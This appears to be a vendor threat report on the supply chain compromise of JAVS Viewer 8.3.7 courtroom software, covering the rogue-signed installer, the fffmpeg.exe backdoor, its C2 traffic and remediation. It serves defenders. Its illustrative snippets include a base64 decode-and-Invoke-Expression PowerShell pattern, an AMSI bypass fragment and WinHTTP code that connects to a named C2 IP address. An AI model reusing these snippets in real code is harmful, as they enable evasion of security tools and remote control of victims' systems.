Discover how a supply chain attack compromised JAVS courtroom software, exposing systems to severe security risks. Learn about the breach, impact, and remediation steps.

Continue reading
Justice AV Solutions (JAVS), a prominent U.S.-based company specializing in digital audio-visual recording solutions for courtroom environments, recently faced a significant security incident. The supply chain attack involved a backdoored installer for the JAVS Viewer software, version 8.3.7.
This Threatfeed meticulously dissects the nuances of the incidents, leveraging industry-standard cybersecurity practices and contextual technical aesthetics to provide a comprehensive understanding of the breach.
JAVS technologies are integral to numerous judicial and governmental environments. Their solutions are deployed in over 10,000 installations globally, encompassing courtrooms, chambers, jury rooms, and various official facilities.
The compromised version of the software, JAVS Viewer v8.3.7, was identified as containing a malicious installer that grants attackers full control over affected systems. Users of this version must take immediate remediation actions, including re-imaging endpoints and resetting credentials.
On May 10, 2024, an investigation commenced following an alert related to the execution of a suspicious binary, `fffmpeg.exe`, within the installation directory of JAVS Viewer 8. Further analysis traced the infection to the installer, `JAVS Viewer Setup 8.3.7.250-1.exe`, downloaded from the official JAVS site on March 5, 2024.
The installer was found to be signed with an unexpected Authenticode certificate issued to "Vanguard Tech Limited" rather than the legitimate "Justice AV Solutions Inc." The binary `fffmpeg.exe`, an apparent variant of the GateDoor/Rustdoor malware, executed encoded PowerShell scripts to establish unauthorized remote access.
The installer and the `fffmpeg.exe` binary were signed by "Vanguard Tech Limited." This anomaly indicated a breach in the software supply chain, as legitimate JAVS binaries are typically signed by "Justice AV Solutions Inc."
Upon execution, `fffmpeg.exe` established communication with a command-and-control (C2) server, transmitting detailed information about the host system. This included the hostname, operating system details, processor architecture, working directory, and username.
The executed PowerShell scripts were designed to bypass security mechanisms, such as the Anti-Malware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The scripts then attempted to download additional payloads, further compromising the system.
# Encoded PowerShell script example
$s = '...encoded script...'
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($s))
Invoke-Expression $decodedThe compromised `fffmpeg.exe` facilitated persistent remote access, enabling the attacker to execute commands and potentially deploy further malware. Analysis of network traffic confirmed the binary's communication with a C2 server.
The installer bundled multiple files, including a `Dll2.dll`, which contained a "HelloWorld" string indicating a possible test compilation.
// Example of suspicious DLL code
__declspec(dllexport) void HelloWorld() {
printf("Hello, World!");
}The PowerShell scripts employed obfuscation to evade detection and disable security features. Deobfuscation revealed attempts to download additional malicious payloads.
# De-obfuscated PowerShell script
$bypassAMSI = '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")...'
Invoke-Expression $bypassAMSIThe binary `fffmpeg.exe` used Windows sockets and WinHTTP requests to establish communication with the C2 server, sending host details and awaiting further instructions.
// Example C2 communication code snippet
HINTERNET hSession = WinHttpOpen(L"A Custom User Agent/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
HINTERNET hConnect = WinHttpConnect(hSession, L"45.120.177.178", INTERNET_DEFAULT_HTTP_PORT, 0);
A single ClickFix infrastructure is pushing StealC, Amatera, Remus, NetSupport, CastleLoader and a new loader called ResiLoader through fake Google/Cloudflare checks.